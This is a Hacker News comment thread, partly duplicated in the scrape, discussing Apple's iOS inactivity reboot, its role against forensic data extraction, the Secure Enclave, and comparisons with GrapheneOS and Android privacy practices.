If I were looking for low hanging fruit, I suspect it wouldn’t reboot if you were to replicate the user’s home WiFi environment in the faraday cage, sans internet connection of course. It could be as simple as playing a video continuously.
Great writeup, but I wonder why so much emphasis is put on not 'connected to network' part. It seems like a timed inactivity reboot is a simpler idea than any type of inter-device communication schemes. It's not new either; Grapheneos had this for a while now and the default is 18 hours (and you can set it to 10 minutes) which would be a lot more effective as a countermeasure against data exfiltration tools.
This is because earlier reports coming out of law enforcement agencies suggested that the network was involved in making even older devices reboot. This blog post is an effort to debunk that claim.
If you’re targeting these evidence grabbing/device exploiting mobs, generally the phones get locked into a faraday cage to drop the mobile network so that they can’t receive a remote wipe request from iCloud.
1. surely unconditionally rebooting locked iPhones every 3 days would cause issues in certain legit use cases?
2. If I read the article correctly, it reboots to re-enter "Before First Unlock" state for security. Why can't it just go into this state without rebooting?
Bonus question: my Android phone would ask for my passcode (can't unlock with fingerprint or face) if it thinks it might be left unattended (a few hours without moving etc.), just like after rebooting. Is it different from "Before First Unlock" state? (I understand Android's "Before First Unlock" state could be fundamentally different from iPhone's to begin with).
> 1. surely unconditionally rebooting locked iPhones every 3 days would cause issues in certain legit use cases?
I wonder if this explains why the older iPhone I keep mounted to my monitor to use as a webcam keeps refusing to be a webcam so often lately and needing me to unlock it with my password...
They have a long history of encrypting firmware. iBoot just stopped being decrypted recently with the launch of PCC, and prior to iOS 10 the kernel was encrypted too.
The operating theory is that higher management at Apple sees this as a layer of protection. However, word on the street is that members of actual security teams at Apple want it to be unencrypted for the sake of research/openness.
iOS security is mostly about protecting IP for app publishers and media companies. MacOS is being pushed the same way.
User privacy and security are to some degree along for the ride; IP security pays the bills, user privacy gives staff some fuzzies and gives them some market differentiation. It's not all for show/IP protection. Apple has told the US government to fuck off in a terrorist investigation and also told the FBI to fuck off with wanting a backdoor. They have made a lot of choices where they have clearly taken a more complicated or difficult way to get something done, that was more privacy-respecting for the user. For example, the way iPhones query the wifi location database. The phone asks for a large block of WiFi APs and then searches that on-device...instead of what Google used to do; feed them a list of MAC addresses and get a location back.
Also, on an iPhone, you can disable things like contributing to traffic data, along with a slew of other location-based functionality, even stuff that will affect system functions....but Apple won't punish you for it. You can disable contributing to traffic data but still get traffic data from Apple. By and large, the only functionality you lose is that which intrinsically needed the location data that you shut off. Google has consistently done the opposite - they hold you over a barrel and say "if you're not going to feed us data, we're not going to give you any. And we're going to yank this entire chunk of functionality", even though the device itself is constantly collecting data for them, most of it of little or no benefit to you.
The major thing Apple does which is similar to Google's attitude: Apple petulantly declares that if you're going to disable Signed Volume Security (the incredibly complex and so-far-unbroken method by which Apple keeps the OS secure from modification)...well gosh, that means someone could haxzor your Gibson and steal unencrypted data off your Filevault-encrypted volume!
So...you are...forced...to...drumroll please.....disable Filevault on the user volume. Because someone might be able to steal data from an encrypted volume via malware, Apple forces you to make it nearly trivial to steal all your data.
This fuckwitted, short-bus riding, mouth-breathing stupidity is unbelievable. Punishing users who want to modify hardware they own by reducing their device security to near zero because they did something that made their computer a bit less secure. It could be set up such that you could modify the volume, then re-sign it in some capacity, a self-signed cert or with a password-protected encryption key...but noooooooope, can't have that!
It's still better than Google, though. Google's interest in privacy is almost entirely because they want to monopolize user tracking data. I don't think they've ever really put their heart into selling media, so they just want to keep everybody else from using your device to collect data and spy on you.
Reboot is not enforced by the SEP, though, only requested. It’s a kernel module, which means if a kernel exploit is found, this could be stopped.
However, considering Apple’s excellent track record on these kind of security measures, I would not at all be surprised to find out that a next generation iPhone would involve the SEP forcing a reboot without the kernels involvement.
what this does is that it reduces the window (to three days) of time between when an iOS device is captured, and a usable* kernel exploit is developed.
* there is almost certainly a known kernel exploit out in the wild, but the agencies that have it generally reserve using them until they really need to - or they’re patched. If you have a captured phone used in a, for example, low stakes insurance fraud case, it’s not at all worth revealing your ownership of a kernel exploit.
Once an exploit is “burned”, they distribute them out to agencies and all affected devices are unlocked at once. This now means that kernel exploits must be deployed within three days, and it’s going to preserve the privacy of a lot of people.
Kernel exploits would let someone bypass the lockscreen and access all the data they want immediately, unless I'm missing something. Why would you even need to disable the reboot timer in this case?
You clearly haven't tried it or even googled it - because it's impossible to do it unattended. A dialog pops up (and only when unlocked) asking you to confirm the reboot. It's probably because they were worried users might end up in a constant reboot/shutdown cycle, though presumably they could just implement a "if rebooted in the last hour by a script, don't allow it again" rule.
In GrapheneOS, you can set it to as little as 10 minutes, with the default being 18 hours. That would be a lot more effective for this type of data exfiltration scenario.
Or to disable it entirely.
Someone could set up and ipad to do something always plugged in, would be bloody annoying to have it locked cold every three days.
I’m not sure, but I wouldn’t expect the inactivity timeout to trigger if the device was already in an unlocked state (if I understand the feature correctly) so in kiosk mode or with the auto screen lock turned off and an app open I wouldn’t expect it to happen.
> With Screen Time, you can turn on Content & Privacy Restrictions to manage content, apps, and settings on your child's device. You can also restrict explicit content, purchases and downloads, and changes to privacy settings.
Conspiracy theory time! Apple puts this out there to break iPad-based DIY home control panels because they're about to release a product that would compete with them.
> Apple puts this out there to break iPad-based DIY home control panels
If you were using an iPad as a home control panel, you'd probably disable the passcode on it entirely - and I believe that'd disable the inactivity reboot as well.
> * there is almost certainly a known kernel exploit out in the wild, but the agencies that have it generally reserve using them until they really need to - or they’re patched.
There's literally emails from police investigators spreading word about the reboots, which state that the device goes from them being able to extract data while in AFU, to them not being able to get anything out of the device in BFU state.
It's a bit pointless, IMHO. All cops will do is make sure they have a search warrant lined up to start AFU extraction right away, or submit warrant requests with urgent/emergency status.
> Reboot is not enforced by the SEP, though, only requested. It’s a kernel module, which means if a kernel exploit is found, this could be stopped.
True. I wonder if they've considered the SEP taking a more active role in filesystem decryption. If the kernel had to be reauthenticated periodically (think oauth's refresh token) maybe SEP could stop data exfiltration after the expiry even without a reboot.
Maybe it would be too much of a bottleneck; interesting to think about though.
How do these things work with devices inside a NAT gateway? Most of our devices are inside a LAN. Even if a server gets started, it won't be visible to the outside world, unless we play with the modem settings.
Now, a hacker/state who has penetrated a device can do an upload of data from the local decice to a CNC server.
But that seems risky as you need to do it again and again. Or do they just get into your device once and upload everything to CNC?
If I were looking for low hanging fruit, I suspect it wouldn’t reboot if you were to replicate the user’s home WiFi environment in the faraday cage, sans internet connection of course. It could be as simple as playing a video continuously.
Great writeup, but I wonder why so much emphasis is put on not 'connected to network' part. It seems like a timed inactivity reboot is a simpler idea than any type of inter-device communication schemes. It's not new either; Grapheneos had this for a while now and the default is 18 hours (and you can set it to 10 minutes) which would be a lot more effective as a countermeasure against data exfiltration tools.
This is because earlier reports coming out of law enforcement agencies suggested that the network was involved in making even older devices reboot. This blog post is an effort to debunk that claim.
If you’re targeting these evidence grabbing/device exploiting mobs, generally the phones get locked into a faraday cage to drop the mobile network so that they can’t receive a remote wipe request from iCloud.
Two questions:
1. surely unconditionally rebooting locked iPhones every 3 days would cause issues in certain legit use cases?
2. If I read the article correctly, it reboots to re-enter "Before First Unlock" state for security. Why can't it just go into this state without rebooting?
Bonus question: my Android phone would ask for my passcode (can't unlock with fingerprint or face) if it thinks it might be left unattended (a few hours without moving etc.), just like after rebooting. Is it different from "Before First Unlock" state? (I understand Android's "Before First Unlock" state could be fundamentally different from iPhone's to begin with).
> 1. surely unconditionally rebooting locked iPhones every 3 days would cause issues in certain legit use cases?
I wonder if this explains why the older iPhone I keep mounted to my monitor to use as a webcam keeps refusing to be a webcam so often lately and needing me to unlock it with my password...
Great writeup! And it's good to see Apple pushing the envelope on device security.
Does anyone have insight into why Apple encrypts SEP firmware? Clearly it’s not critical to their security model so maybe just for IP protection?
They have a long history of encrypting firmware. iBoot just stopped being decrypted recently with the launch of PCC, and prior to iOS 10 the kernel was encrypted too.
The operating theory is that higher management at Apple sees this as a layer of protection. However, word on the street is that members of actual security teams at Apple want it to be unencrypted for the sake of research/openness.
iOS security is mostly about protecting IP for app publishers and media companies. MacOS is being pushed the same way.
User privacy and security are to some degree along for the ride; IP security pays the bills, user privacy gives staff some fuzzies and gives them some market differentiation. It's not all for show/IP protection. Apple has told the US government to fuck off in a terrorist investigation and also told the FBI to fuck off with wanting a backdoor. They have made a lot of choices where they have clearly taken a more complicated or difficult way to get something done, that was more privacy-respecting for the user. For example, the way iPhones query the wifi location database. The phone asks for a large block of WiFi APs and then searches that on-device...instead of what Google used to do; feed them a list of MAC addresses and get a location back.
Also, on an iPhone, you can disable things like contributing to traffic data, along with a slew of other location-based functionality, even stuff that will affect system functions....but Apple won't punish you for it. You can disable contributing to traffic data but still get traffic data from Apple. By and large, the only functionality you lose is that which intrinsically needed the location data that you shut off. Google has consistently done the opposite - they hold you over a barrel and say "if you're not going to feed us data, we're not going to give you any. And we're going to yank this entire chunk of functionality", even though the device itself is constantly collecting data for them, most of it of little or no benefit to you.
The major thing Apple does which is similar to Google's attitude: Apple petulantly declares that if you're going to disable Signed Volume Security (the incredibly complex and so-far-unbroken method by which Apple keeps the OS secure from modification)...well gosh, that means someone could haxzor your Gibson and steal unencrypted data off your Filevault-encrypted volume!
So...you are...forced...to...drumroll please.....disable Filevault on the user volume. Because someone might be able to steal data from an encrypted volume via malware, Apple forces you to make it nearly trivial to steal all your data.
This fuckwitted, short-bus riding, mouth-breathing stupidity is unbelievable. Punishing users who want to modify hardware they own by reducing their device security to near zero because they did something that made their computer a bit less secure. It could be set up such that you could modify the volume, then re-sign it in some capacity, a self-signed cert or with a password-protected encryption key...but noooooooope, can't have that!
It's still better than Google, though. Google's interest in privacy is almost entirely because they want to monopolize user tracking data. I don't think they've ever really put their heart into selling media, so they just want to keep everybody else from using your device to collect data and spy on you.
thank you for such a great writeup, this is an excellent breakdown!
I suspected this was being managed in the Secure Enclave.
That means it's going to be extremely difficult to disable this even if iOS is fully compromised.
If I’m reading this right:
Reboot is not enforced by the SEP, though, only requested. It’s a kernel module, which means if a kernel exploit is found, this could be stopped.
However, considering Apple’s excellent track record on these kind of security measures, I would not at all be surprised to find out that a next generation iPhone would involve the SEP forcing a reboot without the kernels involvement.
what this does is that it reduces the window (to three days) of time between when an iOS device is captured, and a usable* kernel exploit is developed.
* there is almost certainly a known kernel exploit out in the wild, but the agencies that have it generally reserve using them until they really need to - or they’re patched. If you have a captured phone used in a, for example, low stakes insurance fraud case, it’s not at all worth revealing your ownership of a kernel exploit.
Once an exploit is “burned”, they distribute them out to agencies and all affected devices are unlocked at once. This now means that kernel exploits must be deployed within three days, and it’s going to preserve the privacy of a lot of people.
Kernel exploits would let someone bypass the lockscreen and access all the data they want immediately, unless I'm missing something. Why would you even need to disable the reboot timer in this case?
Would be nice if Apple would expose an option to set the timer to a shorter window, but still great work.
You can do this yourself with Shortcuts app.
Create a timer function to run a shutdown on a time interval you order. Change shutdown to "restart".
You clearly haven't tried it or even googled it - because it's impossible to do it unattended. A dialog pops up (and only when unlocked) asking you to confirm the reboot. It's probably because they were worried users might end up in a constant reboot/shutdown cycle, though presumably they could just implement a "if rebooted in the last hour by a script, don't allow it again" rule.
In GrapheneOS, you can set it to as little as 10 minutes, with the default being 18 hours. That would be a lot more effective for this type of data exfiltration scenario.
Or to disable it entirely. Someone could set up and ipad to do something always plugged in, would be bloody annoying to have it locked cold every three days.
I’m not sure, but I wouldn’t expect the inactivity timeout to trigger if the device was already in an unlocked state (if I understand the feature correctly) so in kiosk mode or with the auto screen lock turned off and an app open I wouldn’t expect it to happen.
I'd rather have a dedicated Kiosk mode that has a profile of allow-listed applications and one or more that are auto-started.
Maybe one or two of these will do what you want?
https://support.apple.com/en-us/105121
> With Screen Time, you can turn on Content & Privacy Restrictions to manage content, apps, and settings on your child's device. You can also restrict explicit content, purchases and downloads, and changes to privacy settings.
https://support.apple.com/en-us/111795
> Guided Access limits your device to a single app and lets you control which features are available.
Or "single-app mode", which is a more tightly focused kiosk mode:
https://support.apple.com/guide/apple-configurator-mac/start...
Conspiracy theory time! Apple puts this out there to break iPad-based DIY home control panels because they're about to release a product that would compete with them.
> Apple puts this out there to break iPad-based DIY home control panels
If you were using an iPad as a home control panel, you'd probably disable the passcode on it entirely - and I believe that'd disable the inactivity reboot as well.
It’s more likely than you think!
> Apple's Next Device Is an AI Wall Tablet for Home Control, Siri and Video Calls
https://news.ycombinator.com/item?id=42119559
via
> Apple's Tim Cook Has Ways to Cope with the Looming Trump Tariffs
https://news.ycombinator.com/item?id=42168808
> * there is almost certainly a known kernel exploit out in the wild, but the agencies that have it generally reserve using them until they really need to - or they’re patched.
There's literally emails from police investigators spreading word about the reboots, which state that the device goes from them being able to extract data while in AFU, to them not being able to get anything out of the device in BFU state.
It's a bit pointless, IMHO. All cops will do is make sure they have a search warrant lined up to start AFU extraction right away, or submit warrant requests with urgent/emergency status.
> Reboot is not enforced by the SEP, though, only requested. It’s a kernel module, which means if a kernel exploit is found, this could be stopped.
True. I wonder if they've considered the SEP taking a more active role in filesystem decryption. If the kernel had to be reauthenticated periodically (think oauth's refresh token) maybe SEP could stop data exfiltration after the expiry even without a reboot.
Maybe it would be too much of a bottleneck; interesting to think about though.
> Reboot is not enforced by the SEP, though, only requested
We (the public) do not know if SEP can control nRST of the main cores, but there is no reason to suspect that it cannot.
How do these things work with devices inside a NAT gateway? Most of our devices are inside a LAN. Even if a server gets started, it won't be visible to the outside world, unless we play with the modem settings.
Now, a hacker/state who has penetrated a device can do an upload of data from the local decice to a CNC server.
But that seems risky as you need to do it again and again. Or do they just get into your device once and upload everything to CNC?
This particular feature doesn’t rely on network connectivity or lack thereof.
Here’s some info about how some spyware works:
https://www.kaspersky.com/blog/commercial-spyware/50813/
tell me you didn't read the article a little harder.